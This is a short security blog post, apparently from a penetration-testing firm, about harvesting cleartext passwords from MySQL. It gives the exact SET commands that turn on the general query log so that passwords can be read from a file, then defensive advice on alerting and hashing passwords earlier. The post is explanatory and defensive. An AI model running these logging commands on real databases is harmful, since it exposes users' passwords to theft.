Passwords in DB Logs

This was useful (for an attacker) when password hashing (during authentication) was being performed at the DB level.


Having access to a DB with encrypted (and salted) password hashes can still present a challenge to recovering a significant percentage of the cleartext passwords.  Sure, one will be able to crack some using a decent dictionary/password list, but depending on the cipher used, it can be VERY slow and only recover a small percentage.  If the app sends the cleartext password down to the DB, and uses AES_ENCRYPT (for example), then you can easily recover passwords of active users on the app.

The Attack

From within the MySQL console:

SET global log_output = 'FILE';
SET global general_log_file='/tmp/mysql.log';
SET global general_log = 1;

Now, just monitor for the cleartext passwords being logged in /tmp/mysql.log!

When done, you can turn it off with:

SET global general_log = 0;

Blue Team Solution

First, understand:

  • this example is for MySQL, but can be applied to any DB
  • the type of data present in verbose DB logging. Ex: cleartext passwords

To minimize the chances of this attack:

  1. monitor for “general_log” being set to “1” and generate an alert for it
  2. push password hashing as close to the user as possible.  Example: To the API or app server


Original Source:

Schedule a no obligation consultation with PEN Consultants today! Information & Cybersecurity Testing - Penetration Testing, Red Teaming, Vulnerability Scanning and Assessment services for Apps, Web Apps, Network, Wireless, and more!